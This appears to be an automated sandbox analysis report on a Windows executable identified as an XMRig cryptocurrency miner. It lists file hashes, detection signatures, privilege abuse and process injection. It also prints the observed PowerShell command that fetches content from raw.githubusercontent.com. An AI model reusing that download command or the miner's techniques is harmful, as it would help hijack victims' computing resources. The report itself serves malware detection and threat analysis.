Analysis
-
max time kernel
110s -
max time network
117s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19-12-2024 04:44
Behavioral task
behavioral1
Sample
0cf3a25d268ff5ff8073bc2f4bc0227328c3e160bbd3f93c99ca64d102003f76.exe
Resource
win7-20241010-en
General
-
Target
0cf3a25d268ff5ff8073bc2f4bc0227328c3e160bbd3f93c99ca64d102003f76.exe
-
Size
1.8MB
-
MD5
e860d8b9ac92d73396e751573e99e393
-
SHA1
2aebab66676d179f325812d7bf794ddf28e355c3
-
SHA256
0cf3a25d268ff5ff8073bc2f4bc0227328c3e160bbd3f93c99ca64d102003f76
-
SHA512
f16467cf155d75dac42e99884b294081e3db5589466ab862f1f4107ad69e968a589e0683b2d70f03a461fefc473b0a9e8102d26c2aef6af9775fae80f0df110a
-
SSDEEP
24576:zv3/fTLF671TilQFG4P5PMkibTJH+2Q/ynKeWY1s38kQu12bPxvyuzaBgJ9pcFty:Lz071uv4BPMkibTIA5I4TNrpDGd9WE+
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/4948-21-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp xmrig behavioral2/memory/4948-271-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp xmrig behavioral2/memory/4948-273-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp xmrig behavioral2/memory/4948-274-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp xmrig behavioral2/memory/4948-275-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp xmrig behavioral2/memory/4948-276-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp xmrig behavioral2/memory/4948-277-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp xmrig behavioral2/memory/4948-278-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp xmrig behavioral2/memory/4948-279-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp xmrig behavioral2/memory/4948-280-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp xmrig behavioral2/memory/4948-281-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp xmrig behavioral2/memory/4948-282-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp xmrig -
Blocklisted process makes network request 22 IoCs
flow pid Process 8 4460 powershell.exe 10 4460 powershell.exe 20 4460 powershell.exe 21 4460 powershell.exe 23 4460 powershell.exe 27 4460 powershell.exe 29 4460 powershell.exe 32 4460 powershell.exe 33 4460 powershell.exe 34 4460 powershell.exe 35 4460 powershell.exe 37 4460 powershell.exe 38 4460 powershell.exe 39 4460 powershell.exe 40 4460 powershell.exe 41 4460 powershell.exe 42 4460 powershell.exe 43 4460 powershell.exe 44 4460 powershell.exe 45 4460 powershell.exe 46 4460 powershell.exe 47 4460 powershell.exe -
pid Process 4460 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 7 raw.githubusercontent.com 8 raw.githubusercontent.com -
resource yara_rule behavioral2/memory/4948-0-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp upx behavioral2/memory/4948-21-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp upx behavioral2/memory/4948-271-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp upx behavioral2/memory/4948-273-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp upx behavioral2/memory/4948-274-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp upx behavioral2/memory/4948-275-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp upx behavioral2/memory/4948-276-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp upx behavioral2/memory/4948-277-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp upx behavioral2/memory/4948-278-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp upx behavioral2/memory/4948-279-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp upx behavioral2/memory/4948-280-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp upx behavioral2/memory/4948-281-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp upx behavioral2/memory/4948-282-0x00007FF65D7A0000-0x00007FF65DB92000-memory.dmp upx -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4460 powershell.exe 4460 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeLockMemoryPrivilege 4948 0cf3a25d268ff5ff8073bc2f4bc0227328c3e160bbd3f93c99ca64d102003f76.exe Token: SeLockMemoryPrivilege 4948 0cf3a25d268ff5ff8073bc2f4bc0227328c3e160bbd3f93c99ca64d102003f76.exe Token: SeDebugPrivilege 4460 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 4948 wrote to memory of 4460 4948 0cf3a25d268ff5ff8073bc2f4bc0227328c3e160bbd3f93c99ca64d102003f76.exe 84 PID 4948 wrote to memory of 4460 4948 0cf3a25d268ff5ff8073bc2f4bc0227328c3e160bbd3f93c99ca64d102003f76.exe 84
Processes
-
C:\Users\Admin\AppData\Local\Temp\0cf3a25d268ff5ff8073bc2f4bc0227328c3e160bbd3f93c99ca64d102003f76.exe"C:\Users\Admin\AppData\Local\Temp\0cf3a25d268ff5ff8073bc2f4bc0227328c3e160bbd3f93c99ca64d102003f76.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4460
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82